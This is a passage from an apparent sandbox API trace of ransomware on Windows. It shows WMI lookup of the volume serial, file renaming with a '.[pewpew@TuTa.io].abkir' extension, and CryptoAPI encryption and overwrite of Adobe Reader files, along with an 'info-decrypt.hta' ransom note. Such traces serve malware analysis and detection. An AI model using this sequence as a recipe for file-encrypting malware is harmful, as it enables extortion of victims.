(This=0x6033214) returned 0x3 [0165.026] WbemLocator:IUnknown:Release (This=0x6033214) returned 0x2 [0165.026] SysStringLen (param_1=0x0) returned 0x0 [0165.026] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0165.026] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0165.026] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0165.026] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0165.026] WbemLocator:IUnknown:AddRef (This=0x66b26dc) returned 0x3 [0165.026] WbemLocator:IUnknown:QueryInterface (in: This=0x66b26dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0x66b26dc) returned 0x0 [0165.026] WbemLocator:IUnknown:Release (This=0x66b26dc) returned 0x3 [0165.026] WbemLocator:IUnknown:Release (This=0x66b26dc) returned 0x2 [0165.026] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0165.026] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0165.026] IWbemServices:GetObject (in: This=0x6033214, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6028180, ppCallResult=0x0) returned 0x0 [0167.219] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a90, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0167.219] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0167.219] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0167.219] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3669698*=0, plFlavor=0x366969c*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3669698*=8, plFlavor=0x366969c*=0) returned 0x0 [0167.219] SysStringByteLen (bstr="9C354B42") returned 0x10 [0167.219] SysStringByteLen (bstr="9C354B42") returned 0x10 [0167.219] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3669698*=8, plFlavor=0x366969c*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3669698*=8, plFlavor=0x366969c*=0) returned 0x0 [0167.219] SysStringByteLen (bstr="9C354B42") returned 0x10 [0167.219] SysStringByteLen (bstr="9C354B42") returned 0x10 [0167.219] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", lpFilePart=0x0) returned 0x33 [0167.219] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x56 [0167.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0167.219] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x1e2318e0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0167.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0167.220] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0167.221] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm", lpFilePart=0x0) returned 0x35 [0167.221] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0167.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0167.221] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0167.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0167.221] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm", lpFilePart=0x0) returned 0x35 [0167.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0167.221] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm"), fInfoLevelId=0x0, lpFileInformation=0x3669bbc | out: lpFileInformation=0x3669bbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42b6)) returned 1 [0167.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0167.539] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm", lpFilePart=0x0) returned 0x35 [0167.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0167.539] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x428 [0167.539] GetFileType (hFile=0x428) returned 0x1 [0167.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0167.539] GetFileType (hFile=0x428) returned 0x1 [0167.539] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x42b6 [0167.540] ReadFile (in: hFile=0x428, lpBuffer=0x36dd864, nNumberOfBytesToRead=0x42b6, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x36dd864*, lpNumberOfBytesRead=0x8f6eedc*=0x42b6, lpOverlapped=0x0) returned 1 [0167.542] CloseHandle (hObject=0x428) returned 1 [0167.542] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0x66ba498) returned 1 [0167.543] CryptGenRandom (in: hProv=0x66ba498, dwLen=0x10, pbBuffer=0x36e1e70 | out: pbBuffer=0x36e1e70) returned 1 [0169.462] CryptImportKey (in: hProv=0x66ba498, pbData=0x3662148, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f9d0) returned 1 [0169.462] CryptContextAddRef (hProv=0x66ba498, pdwReserved=0x0, dwFlags=0x0) returned 1 [0169.462] CryptContextAddRef (hProv=0x66ba498, pdwReserved=0x0, dwFlags=0x0) returned 1 [0169.462] CryptDuplicateKey (in: hKey=0xb7f9d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7fb90) returned 1 [0169.462] CryptContextAddRef (hProv=0x66ba498, pdwReserved=0x0, dwFlags=0x0) returned 1 [0169.462] CryptSetKeyParam (hKey=0xb7fb90, dwParam=0x4, pbData=0x3662228*=0x1, dwFlags=0x0) returned 1 [0169.462] CryptSetKeyParam (hKey=0xb7fb90, dwParam=0x1, pbData=0x36621f4, dwFlags=0x0) returned 1 [0169.463] CryptEncrypt (in: hKey=0xb7fb90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3662238*, pdwDataLen=0x8f6eea8*=0x42c0, dwBufLen=0x42c0 | out: pbData=0x3662238*, pdwDataLen=0x8f6eea8*=0x42c0) returned 1 [0169.463] CryptEncrypt (in: hKey=0xb7fb90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x366651c*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x366651c*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0169.464] CryptDestroyKey (hKey=0xb7f9d0) returned 1 [0169.464] CryptReleaseContext (hProv=0x66ba498, dwFlags=0x0) returned 1 [0169.464] CryptReleaseContext (hProv=0x66ba498, dwFlags=0x0) returned 1 [0169.464] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm", lpFilePart=0x0) returned 0x35 [0169.464] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0169.465] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0170.463] GetFileType (hFile=0x264) returned 0x1 [0170.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0170.464] GetFileType (hFile=0x264) returned 0x1 [0170.464] WriteFile (in: hFile=0x264, lpBuffer=0x36dd5c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x36dd5c4*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0170.465] CloseHandle (hObject=0x264) returned 1 [0170.466] CoTaskMemAlloc (cb=0x20c) returned 0x66ca998 [0170.466] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66ca998 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0170.466] CoTaskMemFree (pv=0x66ca998) [0170.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0170.466] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0170.467] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0170.467] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0170.467] IUnknown:Release (This=0xb51e34) returned 0x1 [0170.469] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6027700) returned 0x0 [0170.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027700, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0170.469] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027700, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6030cc0) returned 0x0 [0170.469] WbemDefPath:IUnknown:Release (This=0x6027700) returned 0x0 [0170.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6030cc0) returned 0x0 [0170.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0170.469] WbemDefPath:IUnknown:AddRef (This=0x6030cc0) returned 0x3 [0170.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0170.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0170.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0x66ce478) returned 0x0 [0170.470] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce478, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0170.470] WbemDefPath:IUnknown:Release (This=0x66ce478) returned 0x3 [0170.470] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0170.470] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0170.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0170.470] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x2 [0170.470] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x1 [0170.470] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0170.470] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0170.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6030cc0) returned 0x0 [0170.470] WbemDefPath:IUnknown:AddRef (This=0x6030cc0) returned 0x3 [0170.470] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x2 [0170.470] WbemDefPath:IWbemPath:SetText (This=0x6030cc0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0170.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0170.470] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0170.470] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0170.470] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030cc0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0170.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0170.470] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030cc0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0170.470] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030cc0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0170.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0170.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0170.470] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0170.471] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0170.471] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0170.471] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0170.471] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0170.471] IUnknown:Release (This=0xb51e34) returned 0x1 [0170.472] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x60276f0) returned 0x0 [0170.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x60276f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0170.472] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60276f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6030d30) returned 0x0 [0170.472] WbemDefPath:IUnknown:Release (This=0x60276f0) returned 0x0 [0170.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6030d30) returned 0x0 [0170.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0170.472] WbemDefPath:IUnknown:AddRef (This=0x6030d30) returned 0x3 [0170.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0170.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0170.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0x66ce4d8) returned 0x0 [0170.472] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce4d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0170.472] WbemDefPath:IUnknown:Release (This=0x66ce4d8) returned 0x3 [0170.472] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0170.472] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0170.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0170.472] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 